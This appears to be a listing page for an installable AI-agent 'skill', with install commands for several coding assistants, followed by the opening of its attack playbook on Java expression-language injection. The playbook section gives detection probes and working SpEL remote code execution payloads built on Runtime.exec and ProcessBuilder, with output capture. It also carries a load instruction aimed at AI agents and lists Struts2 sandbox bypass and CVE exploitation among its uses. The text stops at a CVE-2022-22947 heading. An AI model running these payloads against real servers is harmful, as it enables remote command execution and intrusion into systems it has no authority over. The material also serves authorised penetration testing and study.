## What it does

This skill provides attack techniques targeting expression evaluators in Java applications, including Spring, Struts2, and Confluence. It draws a clear boundary between EL injection and SSTI engines like Jinja2 or Twig. The focus remains on framework evaluators rather than template rendering.

The guide includes polyglot probes like `${7*7}` and `%{7*7}` to identify active interpreters. It details RCE payloads using `Runtime.exec` or `ProcessBuilder`, output capture methods, and sandbox bypasses using reflection or `_memberAccess`. Attack paths cover Spring Cloud Gateway actuator routes (CVE-2022-22947) and Confluence CVE-2021-26084.

Techniques apply strictly to Java runtimes. Running these payloads against non-Java backends will fail because syntax and class loaders differ.

## Requirements
- Works with: Confluence

## Install

### Claude Code (native platform)

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill expression-language-injection -a claude-code
```

2. **Manually: put the files in place**
- File: `~/.claude/skills/expression-language-injection/SKILL.md` — Copy the whole skill folder; for one project use .claude/skills/expression-language-injection/

### Codex

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill expression-language-injection -a codex
```

2. **Manually: put the files in place**
- File: `.agents/skills/expression-language-injection/SKILL.md` — For all projects use ~/.agents/skills/

### Cursor

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill expression-language-injection -a cursor
```

2. **Manually: put the files in place**
- File: `.cursor/skills/expression-language-injection/SKILL.md` — Cursor also reads .agents/skills/ and .claude/skills/

### GitHub Copilot

1. **GitHub CLI**
```bash
gh skill install yaklang/hack-skills expression-language-injection
```

2. **Manually: put the files in place**
- File: `.github/skills/expression-language-injection/SKILL.md`

### Gemini CLI

1. **Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill expression-language-injection -a gemini-cli
```

2. **Platform CLI**
```bash
gemini skills install https://github.com/yaklang/hack-skills --path skills/expression-language-injection
```

### Windsurf (Devin Desktop)

**Manually: put the files in place**
- File: `.devin/skills/expression-language-injection/SKILL.md` — The legacy .windsurf/skills/ path still works

### OpenCode

**Skills CLI (Vercel)**
```bash
npx skills add yaklang/hack-skills --skill expression-language-injection -a opencode
```

### Claude.ai

**Claude.ai**
- Zip the folder and upload it in Settings → Capabilities → Skills

Where a file is given instead of a command, copy the files from the source to that path: https://github.com/yaklang/hack-skills/tree/HEAD/skills/expression-language-injection/SKILL.md

## When to use it
- identify the active EL engine using polyglot probes
- craft SpEL remote code execution payloads with output capture
- bypass Struts2 sandbox restrictions by modifying `_memberAccess`
- exploit Spring Cloud Gateway actuator routes under CVE-2022-22947

## Example prompts
- Show how to confirm SpEL injection in a Spring Boot parameter using polyglot probes.
- Generate an OGNL payload for Struts2 that executes commands and returns output.
- How do I exploit CVE-2022-22947 on Spring Cloud Gateway via the actuator endpoint?

# SKILL: Expression Language Injection — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert EL injection techniques covering SpEL (Spring), OGNL (Struts2), and Java EL (JSP/JSF). Distinct from SSTI — EL injection targets expression evaluators in Java frameworks, not template engines. Covers sandbox bypass, `_memberAccess` manipulation, actuator abuse, and real-world CVE chains.

## 0. RELATED ROUTING

- [ssti-server-side-template-injection](../ssti-server-side-template-injection/SKILL.md) for template engines (Jinja2, FreeMarker, Twig) — different attack surface
- [jndi-injection](../jndi-injection/SKILL.md) when EL evaluation leads to JNDI lookup

**Key distinction**: SSTI targets template rendering engines; EL injection targets expression evaluators embedded in Java frameworks. They share detection probes (`${7*7}`) but diverge in exploitation.

---

## 1. DETECTION — POLYGLOT PROBES

```text
${7*7}              → 49 = SpEL, OGNL, or Java EL
#{7*7}              → 49 = SpEL (alternative syntax) or JSF EL
%{7*7}              → 49 = OGNL (Struts2)
${T(java.lang.Math).random()}  → random float = SpEL confirmed
%{#context}         → object dump = OGNL confirmed
```

### Disambiguation

| Response to `${7*7}` | Response to `%{7*7}` | Engine |
|---|---|---|
| 49 | literal `%{7*7}` | SpEL or Java EL |
| literal `${7*7}` | 49 | OGNL (Struts2) |
| 49 | 49 | Both may be active |

---

## 2. SpEL (SPRING EXPRESSION LANGUAGE)

### Where SpEL Appears

- `@Value("${...}")` annotations
- Spring Security expressions (`@PreAuthorize`)
- Spring Cloud Gateway route predicates and filters
- Thymeleaf `th:text="${...}"` (when combined with `__${...}__` preprocessing)
- Spring Data `@Query` with SpEL

### RCE via Runtime.exec

```java
${T(java.lang.Runtime).getRuntime().exec("id")}
```

### RCE with Output Capture (Commons IO)

```java
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("id").getInputStream())}
```

### RCE with Output Capture (Spring StreamUtils)

```java
#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec('whoami').getInputStream()))}
```

### ProcessBuilder (alternative when Runtime is blocked)

```java
${new java.lang.ProcessBuilder(new String[]{"id"}).start()}
```

### Spring Cloud Gateway — CVE-2022-22947
